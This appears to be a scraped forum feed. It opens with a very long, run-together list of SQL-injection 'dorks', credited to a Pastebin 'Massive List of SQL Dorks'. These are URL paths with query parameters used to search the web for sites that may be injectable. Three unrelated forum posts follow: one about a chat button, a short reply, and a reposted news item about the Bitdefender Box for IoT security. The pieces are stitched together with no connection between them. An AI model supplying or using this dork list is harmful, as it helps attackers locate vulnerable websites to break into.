rss/event.php?id= event.php?id= main.php?id= rtfe.php?siteid= category.php?cid= classifieds/detail.php?siteid= tools/print.php?id= channel/channel-layout.php?objId= content.php?id= resources/detail.php?id= more_details.php?id= detail.php?id= view_items.php?id= content/programme.php?ID= book.php?id= php/fid985C124FBD9EF3A29BA8F40521F12D097B0E2016.aspx?s = detail.php?id= default.php?cPath= 
more_details.php?id= php/fid8E1BED06B1301BAE3ED64383D5F619E3B1997A70.aspx?s = content.php?id= view_items.php?id= default.php?cPath= book.php?id= view_items.php?id= products/parts/detail.php?id= category.php?cid= book.html?isbn= view_item.php?id= picgallery/category.php?cid= detail.php?id= print.php?sid= displayArticleB.php?id= knowledge_base/detail.php?id= bpac/calendar/event.php?id= mb_showtopic.php?topic_id= pages.php?id= content.php?id= exhibition_overview.php?id= singer/detail.php?siteid= Category.php?cid= detail.php?id= print.php?sid= category.php?cid= more_detail.php?X_EID= book.php?ISBN= view_items.php?id= category.php?cid= htmlpage.php?id= story.php?id= tools/print.php?id= print.php?sid= php/event.php?id= print.php?sid= articlecategory.php?id= print.php?sid= ibp.php?ISBN= club.php?cid= view_items.php?id= aboutchiangmai/details.php?id= view_items.php?id= book.php?isbn= blog_detail.php?id= event.php?id= default.php?cPath= product_info.php?products_id= shop_display_products.php?cat_id= print.php?sid= modules/content/index.php?id= printcards.php?ID= events/event.php?ID= more_details.php?id= default.php?TID= general.php?id= detail.php?id= event.php?id= referral/detail.php?siteid= view_items.php?id= event.php?id= view_items.php?id= category.php?id= cemetery.php?id= index.php?cid= content.php?id= exhibitions/detail.php?id= bookview.php?id= edatabase/home.php?cat= view_items.php?id= store/view_items.php?id= print.php?sid= events/event_detail.php?id= view_items.php?id= detail.php?id= pages/video.php?id= about_us.php?id= recipe/category.php?cid= view_item.php?id= en/main.php?id= print.php?sid= More_Details.php?id= category.php?cid= home.php?cat= article.php?id= page.php?id= print-story.php?id= psychology/people/detail.php?id= print.php?sid= print.php?ID= article_preview.php?id= Pages/whichArticle.php?id= view_items.php?id= Sales/view_item.php?id= book.php?isbn= knowledge_base/detail.php?id= gallery/gallery.php?id= event.php?id= detail.php?id= store/home.php?cat= 
view_items.php?id= detail.php?ID= event_details.php?id= detailedbook.php?isbn= fatcat/home.php?view= events/index.php?id= static.php?id= answer/default.php?pollID= news/detail.php?id= view_items.php?id= events/unique_event.php?ID= gallery/detail.php?ID= print.php?sid= view_items.php?id= board/showthread.php?t= book.php?id= event.php?id= more_detail.php?id= knowledge_base/detail.php?id= html/print.php?sid= index.php?id= content.php?ID= Shop/home.php?cat= store/home.php?cat= print.php?sid= gallery.php?id= resources/index.php?cat= events/event.php?id= view_items.php?id= default.php?cPath= content.php?id= products/products.php?p= auction/item.php?id= products.php?cat= clan_page.php?cid= product.php?sku= item.php?id= events?id= comments.php?id= products/?catID= modules.php?****= fshstatistic/index.php?PID= products/products.php?p= sport.php?revista= products.php?p= products.php?openparent= home.php?cat= news/shownewsarticle.php?articleid= discussions/10/9/?CategoryID= trailer.php?id= news.php?id= ?page= index.php?page= item/detail.php?num= features/view.php?id= site/?details&prodid= product_info.php?products_id= remixer.php?id= proddetails_print.php?prodid= pylones/item.php?item= index.php?cont= product.php?ItemId= video.php?id= detail.php?item_id= filemanager.php?delete= news/newsletter.php?id= shop/home.php?cat= designcenter/item.php?id= board/kboard.php?board= index.php?id= board/view_temp.php?table= magazine-details.php?magid= thread.php/id= index.php?y= products.php?sub= products.html?file= xcart/home.php?cat= event.php?contentID= forum/showthread.php?p= model.php?item= product_details.php?prodid= kboard/kboard.php?board= english/index.php?id= products.php?req= search.php?q= products.php?openparent= product.php?id= content.php?op= event_listings_short.php?s= stat.php?id= print.php?id= tutorial.php?articleid= product.php?product= content/view.php?id= phorum/read.php?3,716,721,quote= php/fidEAD6DDC6CC9D1ADDFD7876B7715A3342E18A865C.aspx?s = 
suffering/newssummpopup.php?newscode= kr/product/product.php?gubun= content.php?nID= search***.php?ki= nightlife/martini.php?cid= detail.php?id= discussions/9/6/?CategoryID= seWork.aspx?WORKID= modules.php?****= products.php?cat= products.php?p= cheats/item.php?itemid= index.php?main= modules/xfmod/forum/forum.php?thread_id= downloads.php?type= club.php?cid= content.php?id= forums/search.php?do= mlx/slip_about_sharebacks.php?item= category.php?categoryid= nasar/news.php?id= news.php?id= show.php?item= rmcs/opencomic.phtml?rowid= products.php?cid= index.php?url= showmedia.php?id= lit_work.php?w_id= site_list.php?sort= home.php?cat= joblog/index.php?mode= eng/board/view.php?id= item.php?id= index.php?m= detail.php?id= goods_detail.php?goodsIdx= index.php?str= episode.php?id= link.php?type= resources/detail.php?id= display-product.php?Product= main/viewItem.php?itemid= item.php?iid= index.php?list= products.php?p= subcat.php?catID= htm/item_cat.php?item_id= addcolumn.php?id= cats.php?cat= cats.php?cat= ?page= modules/content/index.php?id= detail.php?cat_id= site/?details&prodid= product.php?lang= modules/wfdownloads/singlefile.php?cid= details.php?prodid= myResources_noBanner.php?categoryID= product.php?id= ppads/external.php?type= store/product.php?productid= detail.php?id= prod_details.php?products_id= board/templete/sycho/input.php?table= cats.php?cat= product/product.php?product_no= search.php?q= record_profile.php?id= index.php?y= view.php?v_id= awards/index.php?input1= jobsite_storage_equipment/view_products.php?p_id= rural/rss.php?cat= calendar.php?event_id= eshop.php?id= content.php?ID= addimage.php?cid= category.php?cid= artist_info.php?artistId= forum/viewtopic.php?TopicID= browse.php?cid= editProduct.php?cid= main/index.php?uid= tutorials/view.php?id= products.php?p= index.php?size= pylones/item.php?item= categories.php?start= portfolio.html?categoryid= forums/showthread.php?t= item.php?code= products.php?cat= TopResources.php?CategoryID= 
opinion.php?option= modify_en.htm?mode= events/detail.php?id= cart/prod_details.php?prodid= html/home/products/product.php?pid= product.php?product_no= auction/item.php?id= cms/showpage.php?cid= touchy/home.php?cat= products.php?sku= fcms/view.php?cid= newsletter/newsletter.php?letter= campkc-view-event.php?Item_ID= forums/index.php?page= products.php?session= view_event.php?eid= product.php?pcid= db/item.html?item= item.php?item_id= order-now.php?prodid= product.php?id= store_prod_details.php?ProdID= products.php?sku= news.php?item= news.php?id= cart/prod_details.php?prodid= products/products.php?p= category.php?cid= specials.php?osCsid= infusions/book_panel/books.php?bookid= special_offers/more_details.php?id= book.php?id= journal.php?id= category.php?cid= News/press_release.php?id= pages/index.php?pID= exclusive.php?pID= shop/pages.php?page= index.php?cPath= shop/index.php?cat_id= artistdetail.php?ID= products_connections_detail.php?cat_id= php/fid27BF3BCB1A648805B511298CE6D643E72B4D59AD.aspx?s = reviews/more_details.php?id= press_release.php?id= product.php?rangeid= knowledgebase/article.php?id= store/index.php?cat_id= news.php?cat_id= Products/products.php?showonly= eng/store/show_scat.php?cat_id= search/index.php?q= news/press_release.php?id= html/print.php?sid= aggregator.php?id= news/shownews.php?article= default.php?cPath= press_release.php?id= book.php?bookid= cubecart/index.php?cat_id= classified/detail.php?siteid= cart/item_show.php?itemID= theater-show.php?id= cube/index.php?cat_id= preorder.php?bookID= category.php?cid= category.php?cat_id= eventsdetail.php?pid= forum/index.php?topic= print.php?sid= article.php?id= html/products.php?id= print.php?sid= read.php?in= index.php?cat_id= top/store.php?cat_id= hearst_journalism/press_release.php?id= press_release.php?id= shop/category.php?cat_id= projectdisplay.php?pid= FREE/poll.php?pid= onlineshop/productView.php?rangeId= more_details.php?id= ********.php?pid= catalog/index.php?cPath= page.php?id= 
index.php?cPath= article_full.php?id= hearst_journalism/press_release.php?id= dump.php?bd_id= Category.php?cid= products.php?cat= store/products.php?cat_id= product.php?cat_id= v/showthread.php?t= melbourne_details.php?id= stdetail.php?prodID= **********/fid17013034EFB2509745A39CD861F4FEA3E716FBE5.aspx?s = print.php?sid= press_release/release_detail.php?id= shop/shop.php?id= news/v.php?id= education.php?id_cat= store/store.php?cat_id= forums/showthread.php?t= news.php?id= events/event-detail.cfm?intNewsEventsID= article.php?id= viewmedia.php?prmMID= magdetail.php?magid= cemetery.php?id= index.php?id_cat= shop/index.php?cPath= view_songs.php?cat_id= shop/products.php?p= shop/index.php?cat_id= tourism/details.php?id= catalog/index.php?cPath= ViewPodcast.php?id= profile.php?objID= item_show.php?itemID= press_releases/press_releases.php?id= print.php?sid= gallery/categoria.php?id_cat= obj/print.php?objId= print.php?sid= nuell/item_show.php?itemID= products/products.php?p= products/item_show.php?itemId= view_ratings.php?cid= press_releases.php?id= main/content.php?id= shop/index.php?cat_id= book.html?isbn= shop/products.php?cat_id= kshop/home.php?cat= section.php?section= bearstore/store.php?cat_id= page_prod.php?id_cat= default.php?cPath= news.php?category= products/product.php?pid= print.php?sid= print.php?sid= show_bug.cgi?id= news.php?articleID= search/index.php?q= bookSingle.php?bookId= weekly/story.php?story_id= index.php?cPath= catalog/index.php?cPath= more_details.php?id= press_release.php?id= store/showcat.php?cat_id= m/content/article.php?content_id= article.php?id= viewstore.php?cat_id= shop.php?id_cat= news/press-announcements/press_release.php?press_id= publication/ontarget_details.php?oid= product_details.php?prodID= print.php?sid= specials.php?osCsid= category_view.php?category_id= book_dete.php?bookID= index.php?cPath= events.php?pid= articles/index.php?id= category.php?cat_id= html/products_cat.php?cat_id= more_details.php?id= preview.php?pid= 
product.php?productid= Product.php?Showproduct= bbs/view.php?tbl= news.php?id= details/food.php?cid= products.php?cat= calendar/week.php?cid= print.php?id= itemlist.php?categoryID= fshstatistic/index.php?&PID= press_release/release_detail.php?id= product.php?prod_num= products.php?page= con_product.php?prodid= mp-prt.php?item= notice/notice_****.php?id= showproducts.php?cid= site/?details&prodid= downloads.php?file_id= products.php?cat_id= product.php?c= campkc-today.php?Start= index.php?page= detail.php?id= shop/product.php?id= classifieds/showproduct.php?product= product-details.php?prodID= gallery/gallery.php?id= adetail.php?id= home.php?cat= store/item.php?id= products.php?cat= detail.php?prodid= links.php?cat= detail.php?prodid= videos/view.php?id= resources/index.php?cat= dream_interpretation.php?id= category.php?category_id= html/gallery.php?id= item.php?id= category.php?ID= knowledge_base/detail.php?id= home.php?cat= gallery.php?id= category.php?c= index.php?area_id= games/play.php?id= tutorial.php?articleid= directory/showcat.php?cat= gallery/gallery.php?id= news/newsitem.php?newsID= site/public/newsitem.php?newsID= index.php?cat= newsitem.php?newsID= category.php?catid= gallery.php?id= content.php?id= resources/category.php?CatID= media.php?****= store/detail.php?prodid= display_page.php?tpl= calendar/item.php?id= item-menu.php?idSubCat= Blog/viewpost.php?id= news/newsitem.php?newsID= detail.php?prodid= printarticle.php?id= article.php?id= category.php?id= page.php?id= detail.php?prodid= links/resources/links_search_result.php?catid= news_view.php?id= item.php?id= display_page.php?elementId= photog.php?id= home.php?cat= categories.php?catid= categories.php?parent_id= index.php?product= category.php?catId= cm/public/news/news.php?newsid= content.php?page= volunteers/item.php?id= ressource.php?ID= extensions/extlist.php?cat= category.php?id= cms/publications.php?id= page.php?id= offer_info.php?id= cart/detail_prod.php?id= directory.php?cat= 
Shop/home.php?cat= categories.php?cat= newsitem.php?newsid= shareit/readreviews.php?cat= categories.php?cat= item.php?sub_id= index.php?area_id= category.php?catid= item.php?sub_id= index.php?area_id= now_viewing.php?id= categories.php?cat= publications/?id= carry-detail.php?prodID= tools/tools_cat.php?c= detail.php?prodid= gallery/mailmanager/subscribe.php?ID= painting.php?id= Catalog_View_Summary.php?ID= categories.php?parent_id= product-detail.php?prodid= newsitem.php?newsid= liblog/index.php?cat= cart/prod_subcat.php?id= goto.php?area_id= catalog.php?CAT= showthread.php?t= category.php?id= item.php?item= site/cat.php?setlang= item.php?id= videos/view.php?id= item.php?SKU= display_page.php?id= index.php?id= faq/category.php?id= news/newsitem.php?newsid= cat.php?cat= review.php?id= knowledgebase/article.php?id= forums/showthread.php?t= product_info.php?products_id= cart/home.php?cat= item.php?id= board/viewtopic.php?id= page.php?id= english/gallery.php?id= detail.php?prodid= detail.php?prodid= item.php?item_id= article.php?ID= categories.php?cat= media.php?****= home.php?cat= gallery/gallery.php?id= library.php?author= item.php?cat= cart/home.php?cat= vb/showthread.php?p= news-item.php?id= ads/index.php?cat= item.php?code= kids-detail.php?prodID= index.php?id= category.php?id= addsiteform.php?catid= categories.php?cat= newshop/category.php?c= news/news-item.php?id= product.php?proid= catalog/product_info.php?products_id= products.php?cat= product.php?productid= browsepr.php?pr= products.php?cat= productDetail.php?prodId= productDetail.php?prodId= product.php?products_id= product.php?productid= browsepr.php?pr= product.php?ProductID= product-details.php?prodId= product_details.php?prodid= product_info.php?products_id= product.php?id= browsepr.php?pr= products.php?cat= product_details.php?product_id= products.php?cat= product.php?proid= productlist.php?tid= products.php?cat= product_details.php?product_id= products/product.php?article= products.php?cid= 
forums/showthread.php?t= show_prod.php?p= new/showproduct.php?prodid= product.php?productid= prod.php?Cat= productlist.php?fid= product.php?pl= product.php?proID= product_details.php?product_id= PCMA/productDetail.php?prodId= product.php?proid= panditonline/productlist.php?id= productlist.php?id= js_product_detail.php?pid= prod.php?cat= poem.php?id= estore/products.php?cat= summary.php?PID= productdetails.php?prodId= product-details.php?prodID= en/product.php?proid= product-list.php?ID= main/product.php?productid= product.php?product= site/catalog.php?cid= resources/index.php?cat= SearchProduct/ListProduct.php?PClassify_3_SN= Products/product.php?pid= clear/store/products.php?product_category= earth/visitwcm_view.php?id= products.php?categoryID= product.php?productid= products/products.php?cat= product.php?pid= product.php?proid= home.php?cat= html/projdetail.php?id= products/index.php?cat= productDetails.php?prodId= proddetail.php?prod= product.php?productid= products.php?subgroupid= product_info.php?products_id= prod.php?cat= product_detail.php?prodid= discont_productpg.php?product_id= giftshop/product.php?proid= products.php?cat= product.php?product_id= shop/products.php?cat= product_info.php?products_id= products.php?cat= SearchProduct/ListProduct.php?PClassify_3_SN= productlist.php?id= products.php?cat= product_customed.php?pid= products.php?cat= productlist.php?id= product.php?id= materials/item_detail.php?ProductID= products/productdetails.php?prodID= product_details.php?product_id= products.php?cat= projDetail.php?id= main/product.php?productid= product_details.php?product_id= product.php?proid= ProductDetails.php?ProdID= store/product.php?productid= x/product.php?productid= product.php?productid= product.php?id= iam/tabbedWithShowcase.php?pid= reviews/index.php?cat= product.php?productid= product.php?pid= product.php?proid= mhp/my***.php?hls= xcart/product.php?productid= products.php?cat= xcart/product.php?productid= productlist.php?id= 
product_info.php?products_id= productlist.php?cat= prodrev.php?cat= productlist.php?id= projdetail.php?id= store/customer/product.php?productid= product.php?product_id= product.php?productid= products.php?cat= cats_disp.php?cat= product.php?product_id= productdetails.php?prodid= product_details.php?product_id= product_details.php?product_id= product.php?id= productlist.php?tid= ddoecom/product.php?proid= proddetail.php?prod= productlist.php?fid= products.php?cat= Products/Catsub.php?recordID= Products/mfr.php?mfg= site/catalog.php?pid= shop/product_details.php?ProdID= usar/productDetail.php?prodID= products/display_product.php?product_id= products.php?cat= cardIssuance/product.php?pid= product.php?proid= products.php?parent= products.php?catId= productDetail.php?prodID= productlist.php?fid= products.php?mainID= products.php?cat= product_info.php?products_id= product_detail.php?prodid= catalog/product_info.php?products_id= product_info.php?products_id= products.php?cat= product.search.php?proid= productlist.php?id= product.php?proid= product.php?pid= product_reviews.php?feature_id= product.php?product_id= product.php?productid= item.php?id= directorylisting.php?cat= historical/st Link: Massive List of SQL Dorks - Pastebin.com
  23. Aerosol

    For chat!

    @Wired there is already a button for this, I'll come back with pictures. It's the last button: you press it once and it turns out like this, that's about all. Check for yourself before you make pointless topics...
  24. @rom3ocrash I understand, it's no problem. And don't get upset because you're being attacked.
  25. Bitdefender Box keeps viruses away from gadgets that are part of the Internet of Things. Bitdefender has launched, for now in the US, a unique product meant to provide IT security for devices of any type connected to the Internet. Bitdefender Box will protect not only computers, phones and tablets, but also smart TVs, smart refrigerators, lighting systems or alarm systems connected to Wi-Fi. It is an antivirus solution that is both software and hardware, which Americans will be able to pre-order from mid-December, with the product reaching users in January. Bitdefender is not going after the Romanian market for now, because the number of internet-connected household appliances here is low. With this box that you put in your house and connect to the Internet, you no longer worry about viruses; the Romanians are the first player in the industry to create a complete solution against IT threats for the Internet of Things. The official launch of Bitdefender BOX will take place at the end of January, in the United States of America. After the American market, the launch plan also includes several markets in Western Europe. Bitdefender BOX is an ingenious mix of hardware and software, presented in a case with a minimalist design, which offers an innovative level of protection for all the things and people that cross the threshold of a home. The complex degree of network-level protection prevents any type of threat even before it reaches the smart devices that surround us at home. At the same time, Bitdefender BOX is equipped with anti-theft technologies, which prevent the loss or theft of devices, as well as tune-up functions, which optimize and update operating systems to ensure the best possible operation. Source I, for one, can't wait for it to launch here too.